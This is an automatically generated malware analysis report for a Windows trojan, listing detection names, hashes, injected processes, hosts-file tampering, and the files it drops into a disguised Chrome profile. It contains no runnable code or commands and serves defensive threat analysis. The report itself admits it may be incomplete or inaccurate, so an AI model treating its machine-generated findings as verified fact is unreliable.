Gen.Variant.Zusy.147731_efe9dfa0fb

by malwarelabrobot on August 20th, 2015 in Malware Descriptions.

Trojan.Win32.Agent.nerwrv (Kaspersky), Gen:Variant.Zusy.147731 (B) (Emsisoft), Gen:Variant.Zusy.147731 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: efe9dfa0fbebc8e78d5907b14a2f6ac2
SHA1: 4cb0308b6ba2cfd0bd7d3a7f3c6ade83362b4f1a
SHA256: f2036195cd169782e6c723442e7f6075c6ef8f406c4996488812ed792282eacd
SSDeep: 24576:GujZHwE0I33t4pvTq5s4Y91UDW iQ4JdTvkjMzEZNkw1kvPo3:GujVOqO4Y9JQ4JdTvkj
Size: 1843200 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-12 22:56:40
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

iis.exe:448
chrome.exe:2468
chrome.exe:444
chrome.exe:2068
chrome.exe:2420
chrome.exe:2100
chrome.exe:3720
wget.exe:2000

The Trojan injects its code into the following process(es):

cin.exe:1396
chrome.exe:876
chrome.exe:336
chrome.exe:1308
%original file name%.exe:668

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
RasPbFile
ZonesCounterMutex
ShimCacheMutex

File activity

The process cin.exe:1396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\etc\hosts (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\wget.exe (7253 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\cin.exe.run (78 bytes)

The process iis.exe:448 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-BR.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\cs.pak (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\da.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\kn.pak (4074 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\icudt.dll (455362 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\cs.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\it.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\de.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\chrome.exe (30992 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\he.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nb.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-US.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hi.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es-419.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ca.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-CN.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\gu.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nl.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bn.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pl.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fr.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sr.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sw.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ta.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ja.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\uk.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\chrome.dll (794832 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\id.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ml.pak (4074 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hr.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-GB.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\it.pak (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sk.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-PT.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fi.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\et.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\el.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\uk.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\tr.pak (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fa.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\et.pak (2249 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\resources.pak (40311 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\th.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\chrome_100_percent.pak (6625 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sw.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ar.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ar.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\vi.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ro.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\libpeerconnection.dll (56491 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bg.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\PepperFlash\manifest.json (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\am.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-TW.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ru.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-BR.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fil.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\he.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\te.pak (3257 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-TW.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\da.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pt-PT.pak (250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fi.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\PepperFlash\pepflashplayer.dll (277843 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\vi.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hi.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\de.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-US.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fa.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ms.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\te.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sv.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\mr.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ja.pak (1274 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lv.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sl.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ca.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\nb.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\zh-CN.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ro.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ko.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sr.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lt.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ru.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\am.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bg.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hu.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\en-GB.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ml.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\el.pak (3461 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lv.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\mr.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fil.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hu.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\kn.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\bn.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\th.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\es-419.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\gu.pak (2282 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ms.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sv.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\sk.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\tr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\fr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\pl.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\hr.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\lt.pak (762 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\id.dll (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ta.pak (5049 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\30.0.1573.2\Locales\ko.dll (9 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\__tmp_rar_sfx_access_check_1323593 (0 bytes)

The process chrome.exe:876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Network Action Predictor-journal (12870 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Shortcuts-journal (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KebGwhiEGvOYBtm (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\8.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_IGvlFJjUqRhIydj (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_S4AtrcJZtHDsWT1 (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_HfxwqJrUG9agR7Y (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_0 (33644 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_1 (25936 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_2 (5648 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\data_3 (200 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_dQBYjDxcxcpVOz7 (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\7.tmp (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Origin Bound Certs (495 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Login Data (1454 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Origin Bound Certs-journal (1682 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Network Action Predictor (7647 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History-journal (13168 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Favicons-journal (15988 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\6.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\000002.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\User StyleSheets\Custom.css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_baqSUhrlvI2z50q (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\2.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000002.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\MANIFEST-000001 (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\MANIFEST-000002 (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Top Sites-journal (12020 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_K3VyIMiaw5mZ0Y5 (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_G56vGeNP2h9gqCm (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History Index 2014-04 (15028 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\B.tmp (129 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\9.tmp (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Shortcuts (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cookies (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7.tmp (23730 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\3.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Top Sites (5232 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\f_000002 (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\f_000001 (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Archived History (21037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_SpKiY6DlpnTZ9Lc (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Current Session (4466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_ubJaX3UoLepJd59 (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\First Run (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cookies-journal (2791 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Archived History-journal (12592 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Favicons (4342 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History Index 2014-04-journal (15736 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Safe Browsing Cookies-journal (2791 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\4.tmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\LOG (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Web Data (31429 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Login Data-journal (564 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\000003.log (551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_WzNZb1HdzReTbOR (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\History (29905 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Web Data-journal (1612 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\1.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Visited Links (360 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Safe Browsing Cookies (745 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\000001.dbtmp (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sk\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_PT (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\hr\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\craw_background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\html\craw_window.html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pt_BR\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_TW (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\MANIFEST-000001 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\cs\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ca\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension Rules\MANIFEST-000001 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sv\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fr (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\da\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Preferences~RF151239.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\fi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\html (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\images\icon_16.png (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\it (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\profile\Default\Extension State\CURRENT~RF14c8dc.TMP (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\uk\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\id (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\ko\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\pl\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_CN\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\de\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\sr\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\en\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\vi (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\th\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nl (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nb (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\id\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\es_419 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\zh_TW\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\de (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lt\messages.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\lv (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\da (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\css (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_876_23820\CRX_INSTALL\_locales\nl\messages.json (0 bytes)
